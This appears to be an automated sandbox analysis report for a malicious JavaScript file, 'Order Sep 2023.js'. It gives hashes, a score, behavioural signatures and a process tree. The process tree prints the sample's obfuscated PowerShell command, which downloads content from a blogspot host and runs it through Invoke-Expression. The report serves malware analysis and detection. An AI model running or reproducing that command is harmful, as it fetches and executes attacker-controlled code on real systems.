Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20230831-en -
resource tags
arch:x64arch:x86image:win7-20230831-enlocale:en-usos:windows7-x64system -
submitted
18-09-2023 13:09
Static task
static1
Behavioral task
behavioral1
Sample
Order Sep 2023.js
Resource
win7-20230831-en
windows7-x64
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
Order Sep 2023.js
Resource
win10v2004-20230915-en
windows10-2004-x64
18 signatures
150 seconds
General
-
Target
Order Sep 2023.js
-
Size
641KB
-
MD5
abcc8edc710ec4950ca9bf69cd99fb46
-
SHA1
d8ccde8c22a61fd95343a3fa1a6bfd735b95665c
-
SHA256
275216a98698d7dbd73a1c75693ef043894e7753711bc606f4de20719f7ec772
-
SHA512
892d5e10efbab46de530841d42ec7daf75df1e3755df5e1f406030adf8193a2207c5d1f02edfbb42c29123b5e8b954086295c024ce2e32b1a8c415e36fed85d2
-
SSDEEP
12:+E2qkhZXa4Ft+CH3fATkvA+72NAMchqV39yex+pBtg/6J35xmn:JWZ/XnHIToAXNArhIys+pA/2pxu
Score
3/10
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2456 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2456 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2000 wrote to memory of 2456 2000 wscript.exe 28 PID 2000 wrote to memory of 2456 2000 wscript.exe 28 PID 2000 wrote to memory of 2456 2000 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe "C:\Users\Admin\AppData\Local\Temp\Order Sep 2023.js"1⤵
- Suspicious use of WriteProcessMemory
PID:2000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c $((irm buzalotr.blogspot.com//////////////////////////////atom.xml) | .('{1}{0}'-f'XXXWww','I').replace('XXXWww','ex'))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456
-